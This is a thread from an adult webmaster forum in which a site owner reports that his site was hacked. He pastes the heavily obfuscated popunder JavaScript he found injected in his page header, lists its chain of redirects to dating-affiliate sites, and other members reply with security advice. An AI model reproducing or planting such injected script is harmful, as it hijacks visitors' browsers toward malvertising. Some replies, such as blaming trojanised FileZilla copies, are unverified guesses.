GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Damn, Got my site hacked again. (https://gfy.com/showthread.php?t=1267927)

lezinterracial 06-17-2017 12:25 AM
Damn, Got my site hacked again.
 
The site is bestfreecamgirls.com.
I noticed pop-ups. Using dreamhost shared hosting. Filezilla to access my files.
Not using wordpress. Using code I wrote myself.

Should I try vps instead? Something other than filezilla?


I found this in my header.
Code:
<script>function J(K,A){function g(){try{C=Math[(String.fromCharCode(0x66,0154,0x6f,111,114))](document[((function () { var M="e",e="ooki",u="c"; return u+e+M })())][((function () { var n$="t",FK="i",fe="sp",R="l"; return fe+R+FK+n$ })())](f+String.fromCharCode(0x4a,101,0x64,61))['g'.length][(String.fromCharCode(115,112,0x6c,105,0164))](String.fromCharCode(0x3b))[('SGmyvkMN'.length-8)]);} catch(K){};return p<=C||document[((function () { var yc="e",t="i",E="cook"; return E+t+yc })())][(String.fromCharCode(0x69,0156,0144,0x65,0x78,79,102))](f+String.fromCharCode(61))!==-'X'.length;}function I(K,A,b,Y,n,c){if(g())return;var H=String.fromCharCode(0x74,111,0157,0154,0142,97,0162,0x3d,0156,111,0x2c,115,99,0162,0x6f,0154,0154,0142,0x61,114,0x73,0x3d,0x79,0145,0x73,44,0x6c,111,99,97,116,0x69,111,110,0x3d,0171,0145,115,44,0x73,0164,97,0164,0165,0x73,98,0141,114,0x3d,0171,0145,0163,0x2c,109,101,0156,117,98,0x61,0x72,0x3d,110,0x6f,0x2c,0162,0x65,115,105,0172,0x61,98,0154,0x65,0x3d,0x31,054,119,0x69,100,0x74,0150,075)+b[((function () { var X="ing",mV="toStr"; return mV+X })())]()+String.fromCharCode(0x2c,0150,101,0151,0147,104,0164,61)+Y[((function () { var kn="ing",l="oStr",t="t"; return t+l+kn })())]()+String.fromCharCode(0x2c,0x73,99,0x72,101,101,0156,88,61)+n+String.fromCharCode(0x2c,0x73,0x63,0x72,0145,0145,0x6e,0x59,0x3d)+c;document[(String.fromCharCode(111,0156,0143,0x6c,0x69,99,0153))]=function(){if(g())return;window[((function () { var mW="n",v="e",h="op"; return h+v+mW })())](String.fromCharCode(0x6a,97,118,97,0163,99,114,105,0160,0x74,58,0x77,0151,110,0x64,0157,0x77,46,102,111,0x63,0165,0x73,0x28,051,0x3b),String.fromCharCode(0137,0x73,0145,0x6c,0x66),"");m=d[((function () { var gy="ndow",ME="i",Yf="w"; return Yf+ME+gy })())][((function () { var v_="en",hU="p",TY="o"; return TY+hU+v_ })())](K,A,H);if(m){var b=new Date();document[((function () { var Fx="kie",fC="o",q="c",HH="o"; return q+HH+fC+Fx })())]=f+(function () { var k="pires=",Al="1;ex",r="="; return r+Al+k })()+new Date(b[(String.fromCharCode(0x73,101,116,0124,105,0155,0x65))](b[(String.fromCharCode(0x67,0x65,0164,84,105,0x6d,101))]()+z))[(String.fromCharCode(0164,111,0x47,0115,0x54,0x53,0164,114,105,110,103))]()+(function () { var Ww="=/",zk="h",gG=";pat"; return gG+zk+Ww })();b=new Date();document[(String.fromCharCode(0x63,0x6f,0157,0x6b,105,0145))]=f+(function () { var DQ="d=",_="Je"; return _+DQ })()+(C+'x'.length)+String.fromCharCode(59,0145,0170,112,0x69,0x72,0x65,0x73,61)+new Date(b[(String.fromCharCode(0163,0x65,0164,0x54,0x69,0x6d,0145))](b[((function () { var Z="e",ZO="im",dT="getT"; return dT+ZO+Z })())]()+('U'.length*('d'.length*60105+8594)+15901)*(0.0+01750)))[((function () { var Q="ring",B="t",N="toGMTS"; return N+B+Q })())]()+(function () { var S="/",jN="th=",$6=";",u="pa"; return $6+u+jN+S })();O();}};}function O(){try{m[((function () { var N="r",xx="u",Iv="b",Mo="l"; return Iv+Mo+xx+N })())]();m[((function () { var td="r",Oo="pene",o="o"; return o+Oo+td })())][((function () { var v="ow",V="wind"; return V+v })())][(String.fromCharCode(0x66,111,0x63,0165,0x73))]();window[(String.fromCharCode(0163,0145,0x6c,0x66))][(String.fromCharCode(119,0151,110,0x64,0x6f,0167))][(String.fromCharCode(0142,0x6c,0x75,0x72))]();window[(String.fromCharCode(102,0157,0143,0165,0x73))]();if(x[(String.fromCharCode(102,0x69,0162,0145,0146,111,120))])s();if(x[((function () { var k="it",l="webk"; return l+k })())])a();} catch(K){}}function s(){var K=window[(String.fromCharCode(0157,0x70,101,0x6e))](String.fromCharCode(97,98,111,0165,0164,072,0142,108,0141,110,0x6b));K[((function () { var Ho="cus",bc="o",u="f"; return u+bc+Ho })())]();K[((function () { var Mt="se",v="clo"; return v+Mt })())]();}function a(){var K=document[(String.fromCharCode(0143,0x72,101,97,0x74,101,0105,0x6c,0x65,0x6d,101,110,116))](String.fromCharCode(0x61));K[(String.fromCharCode(104,0162,0145,102))]=String.fromCharCode(0141,98,0x6f,0x75,0164,072,98,108,0x61,110,0153);K[(String.fromCharCode(116,97,114,0147,101,0164))]=String.fromCharCode(0150,101,0x6c,0160,101,0162);document[((function () { var ug="Name",Z="ByTag",q="getElements"; return q+Z+ug })())](String.fromCharCode(0x62,111,100,121))[('IKlnTroO'.length-8)][((function () { var _e="d",P="ndChil",R="a",r="ppe"; return R+r+P+_e })())](K);K[((function () { var l="de",zi="t",yl="pa",e="No",L="ren"; return yl+L+zi+e+l })())][(String.fromCharCode(0x72,101,0x6d,0x6f,118,0x65,0103,0x68,0151,0154,0144))](K);var A=document[((function () { var F="t",nj="teEven",G="crea"; return G+nj+F })())](String.fromCharCode(0x4d,0x6f,0x75,115,0145,0105,0166,101,0x6e,0x74,115));A[(String.fromCharCode(105,0x6e,0151,116,0x4d,0x6f,0x75,115,101,0x45,0166,101,0x6e,116))](String.fromCharCode(99,108,105,99,0x6b),true,true,window,('nNuai'.length-5),('xSPTbgOBuf'.length-10),('VmvdiKgmO'.length-9),('QL'.length-2),('qnUVb'.length-5),true,false,false,true,('WqoFhp'.length-6),null);K[(String.fromCharCode(0144,0x69,115,112,0x61,0x74,99,0x68,0x45,118,101,0x6e,0x74))](A);window[(String.fromCharCode(111,0160,101,0156))](K[(String.fromCharCode(104,0x72,101,0x66))],K[(String.fromCharCode(0x74,0x61,0162,0x67,0x65,0164))])[(String.fromCharCode(99,0x6c,0157,0163,0145))]();}var d=top!=window[String.fromCharCode(0163,0x65,0154,0x66)]&&typeof top[(String.fromCharCode(0x64,111,0x63,0x75,0x6d,101,110,116))][(String.fromCharCode(0x6c,0x6f,0143,0x61,0164,105,0x6f,110))][((function () { var Z="g",k="n",_="t",i="oStri"; return _+i+k+Z })())]()===(function () { var r="g",l="i",Wm="st",Wl="n",e="r"; return Wm+e+l+Wl+r })()?top:window[(function () { var N="f",X="l",q="se"; return q+X+N })()];var m=null;A=A||{};var b=A[((function () { var lv="me",W="na"; return W+lv })())]||Math[((function () { var o="or",F="lo",G1="f"; return G1+F+o })())](Math[((function () { var V="om",oE="rand"; return oE+V })())]()*(0.0+01750)+'B'.length);var Y=A[((function () { var h="h",U5="dt",bM="w",ME="i"; return bM+ME+U5+h })())]||window[(String.fromCharCode(111,0x75,0x74,101,0162,0127,0151,0x64,116,104))]||window[(String.fromCharCode(0151,0156,110,0145,0x72,87,105,0x64,116,0x68))];var n=A[(String.fromCharCode(104,0x65,105,0x67,104,0x74))]||window[((function () { var kC="ht",v="Heig",D8="o",QY="uter"; return D8+QY+v+kC })())]-(0x2*050+20)||window[((function () { var HP="ght",L="nerHei",o3="in"; return o3+L+HP })())];var c=typeof A[((function () { var zl="eft",T="l"; return T+zl })())]!=(function () { var D="ed",G="n",pN="u",u="ndefi"; return pN+u+G+D })()?A[(String.fromCharCode(0154,0x65,102,0x74))][((function () { var B="ng",OT="tri",l0="t",AK="oS"; return l0+AK+OT+B })())]():window[(String.fromCharCode(115,0143,0162,0x65,0x65,0156,0130))];var H=typeof A[((function () { var R="p",c6="o",oF="t"; return oF+c6+R })())]!=String.fromCharCode(0165,110,100,0x65,0146,0151,0x6e,0145,0x64)?A[(String.fromCharCode(0164,0157,112))][(String.fromCharCode(0x74,0x6f,0123,116,114,105,110,103))]():window[((function () { var w="nY",q2="e",D7="scr",wm="e"; return D7+wm+q2+w })())];var z=A[(String.fromCharCode(0x77,97,105,0164))]||('eB'.length*03135+342);z=z*(0.0+1000);var p=A[(String.fromCharCode(99,0x61,0160))]||'Os'.length;var C=('TIx'.length-3);var f=String.fromCharCode(0x5f,0x70,0157,0164,0x6f,0163);var x=function(){var K=navigator[(String.fromCharCode(0x75,115,101,114,65,0147,0145,0156,0x74))][(String.fromCharCode(0164,0x6f,0x4c,0x6f,119,101,0162,0103,0141,0163,0145))]();var A={"\x77\145\u0062\x6b\x69\x74":/webkit/[(String.fromCharCode(0x74,0x65,115,0x74))](K),"\x6d\157\172\151\u006c\x6c\u0061":/mozilla/[((function () { var Tg="st",cW="te"; return cW+Tg })())](K)&&!/(compatible|webkit)/[((function () { var y="t",KC="es",P="t"; return P+KC+y })())](K),"\143\x68\x72\x6f\x6d\x65":/chrome/[(String.fromCharCode(0x74,101,0163,0164))](K),"\u006d\u0073\151\145":/msie/[((function () { var ZZ="t",t3="s",m2="t",M="e"; return m2+M+t3+ZZ })())](K)&&!/opera/[(String.fromCharCode(116,0x65,0163,0164))](K),"\u0066\151\x72\x65\146\u006f\170":/firefox/[((function () { var aD="st",x_="e",OU="t"; return OU+x_+aD })())](K),"\u0073\x61\u0066\x61\162\x69":/safari/[(String.fromCharCode(116,0x65,115,0x74))](K)&&!/chrome/[(String.fromCharCode(0x74,0145,0x73,0164))](K),"\x6f\u0070\145\x72\x61":/opera/[(String.fromCharCode(0164,0145,0x73,0x74))](K),"\x6d\x6f\x62\151\u006c\145":/mobile|ip(hone|od|ad)|android|blackberry|iemobile|kindle|netfront|silk-accelerated|(hpw|web)os|fennec|minimo|opera m(obi|ini)|blazer|dolfin|dolphin|skyfire|zune/[((function () { var uz="t",L5="tes"; return L5+uz })())](K)};A[(String.fromCharCode(0x76,101,0x72,0x73,0151,0x6f,0x6e))]=A[((function () { var Ko="ri",ff="safa"; return ff+Ko })())]?(K[((function () { var LQ="h",S="tc",Pv="m",U="a"; return Pv+U+S+LQ })())](/.+(?:ri)[\/: ]([\d.]+)/)||[])['E'.length]:(K[(String.fromCharCode(0x6d,0x61,0164,99,0x68))](/.+(?:ox|me|ra|ie)[\/: ]([\d.]+)/)||[])['Q'.length];return A;}();I(K,b,Y,n,c,H);};J((function () { var j="e56015a/",$="d0aa122e96ef6453",m="http://wooga.inf",t="o/GpzD/89e"; return m+t+$+j })(),{"\x6e\u0061\u006d\145":String.fromCharCode(112,0x6f,0x70),"\167\x69\144\u0074\u0068":window[(function () { var F="en",d="scre"; return d+F })()][((function () { var N="h",Q="d",a="w",f="t",V="i"; return a+V+Q+f+N })())],"\u0068\145\151\147\x68\x74":window[(function () { var _="een",c="scr"; return c+_ })()][((function () { var qu="t",I="h",G="heig"; return G+I+qu })())],"\u0074\u006f\x70":('iCFu'.length-4),"\154\u0065\x66\164":('LvhX'.length-4),"\x77\u0061\x69\x74":'TWdBLeF'.length*(1*026+2)*(3*021+9)*(1*0x23+25),"\143\x61\u0070":'u'.length}); // menu_potos</script>
        <meta name="prVerify" content="fa9bbfa833cadb34065b654dc3914ec8" />
        <link rel="stylesheet" type="text/css" href="style.css" media="screen">

InfoGuy 06-17-2017 01:19 AM
Quote:
Originally Posted by lezinterracial (Post 21838930)
The site is bestfreecamgirls.com.
I noticed pop-ups. Using dreamhost shared hosting. Filezilla to access my files.
Not using wordpress. Using code I wrote myself.

Should I try vps instead? Something other than filezilla?

I found this in my header.
What was the popup promoting?

Have you scanned your PC for malware?

Do you use the same password elsewhere?

Have you changed your password to something longer and more complex with lowercase letters, uppercase letters, numbers & special characters? To brute force just an 8-character password utilizing all 4 types (assuming 90+ characters) would require trying over 4 quadrillion (4.30467E+15) potential combinations.

lezinterracial 06-17-2017 01:32 AM
Quote:
Originally Posted by InfoGuy (Post 21838942)
What was the popup promoting?
Different things. Mainly cheating cougars.
First link I see is wooga.info/GpzD/89ed0aa122e96ef6453e56015a/


Quote:
Have you scanned your PC for malware?
not yet.

Quote:
Do you use the same password elsewhere?
no



Quote:
Have you changed your password to something longer and more complex with lowercase letters, uppercase letters, numbers & special characters? To brute force just an 8-character password utilizing all 4 types (assuming 90+ characters) would require trying over 4 quadrillion (4.30467E+15) potential combinations.
at least 13, upper and lower case, special characters and numbers.


Here is where it happened before.
https://gfy.com/fucking-around-and-pr...ript-site.html

lezinterracial 06-17-2017 01:44 AM
The script only effected index.php. stat command only shows when the file was last changed. But I already changed it. Looking on google cache, I know the script was on my site on 6/15.

lezinterracial 06-17-2017 11:07 PM
I moved my site to a VPS. Hope this helps. I am hoping it was a flawed site on my shared server and not my site.


Just in case you were curious.

Redirect detective shows the following.
wooga.info/GpzD/89ed0aa122e96ef6453e56015a/

wmtracer.cn.com/?a=85&c=1692&s1=9248&s2=bf3393854b9dbd1acdec287f09 59ca3d5b41d3c3&s3=2798

yqzjk.imideals.com/c/2332b00a20149287?s1=4816&s2=1222&s5=85&click_id=27 25433

milfalone.com/c/e4a0440f73f4cca4?s1=4816&s2=1222&s3=&s5=85

affiliate.thedatingnetwork.com/tracking/click/v1?site=instanthookups.com&afn=791552&afnPromoCode =1&keyword=4816_1222&tour=bigselector

instanthookups.com/dating/bigselector/791574/4816_1222/hash%3D40-1ed84a24be68adbbe1ab46d930913d34%26pixel%3D11690

instanthookups.com/dating/bigselector/791574/4816_1222/hash%3D40-1ed84a24be68adbbe1ab46d930913d34%26pixel%3D11690

instanthookups.com/dating/bigselector

porncrash 06-18-2017 12:29 AM
I don't really think this was because of shared hosting.

If I have some free minutes, I could check your site against some high-risk security issues, ofc only if you want me to do that.


regards

lezinterracial 06-18-2017 02:56 AM
Quote:
Originally Posted by porncrash (Post 21840166)
I don't really think this was because of shared hosting.

If I have some free minutes, I could check your site against some high-risk security issues, ofc only if you want me to do that.


regards
I am cool with that.

Miguel T 06-18-2017 07:18 AM
You probably have a backdoor somewhere, changing hosts will not solve it mate .

Sarn 06-18-2017 08:43 AM
Not post links here, you will infect users who click them.
What about say log files?

8pt-buck 06-18-2017 08:50 AM
Hope the malicious version of that page was not cached.

romeo22 06-18-2017 08:53 AM
You cant trust anyone nowadays

Beaver1 06-19-2017 09:12 PM
Your problem is Filezilla !

Google Maleware Filezilla since 2013 are a lot Injected Download Mirrors out there.
These reload toons of trojans to your local machine and
submit all your ftp passwords to the intruders.

Hit the format c: button
after closing the ftp on your servers.

Best Regards

ctggls 06-19-2017 09:29 PM
Quote:
Originally Posted by Beaver1 (Post 21843412)
Your problem is Filezilla !

Google Maleware Filezilla since 2013 are a lot Injected Download Mirrors out there.
These reload toons of trojans to your local machine and
submit all your ftp passwords to the intruders.

Hit the format c: button
after closing the ftp on your servers.

Best Regards
Nice one! Did not knew about hacked copies of filezilla. Guess I should upgrade to the laste version from their official site...

lock 06-20-2017 01:59 AM
Quote:
Originally Posted by Beaver1 (Post 21843412)
Your problem is Filezilla !

Google Maleware Filezilla since 2013 are a lot Injected Download Mirrors out there.
These reload toons of trojans to your local machine and
submit all your ftp passwords to the intruders.

Hit the format c: button
after closing the ftp on your servers.

Best Regards
I used it to build a few sites that got hacked 24 hours later. I modified a bunch of things with it and everything I touched was trashed I never actually realized it was filezilla. I usually use other FTPs but wanted one feature to do one thing and kept using it a while. Only realizing now thanks to Beaver what actually happened.

Her-Sson 06-20-2017 05:02 AM
Damm Putin.

nico-t 06-20-2017 09:52 AM
Good luck.

Some fucking retard is trying to reset the passwords on my wordpress sites. What's the point of that?


All times are GMT -7. The time now is 08:41 AM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123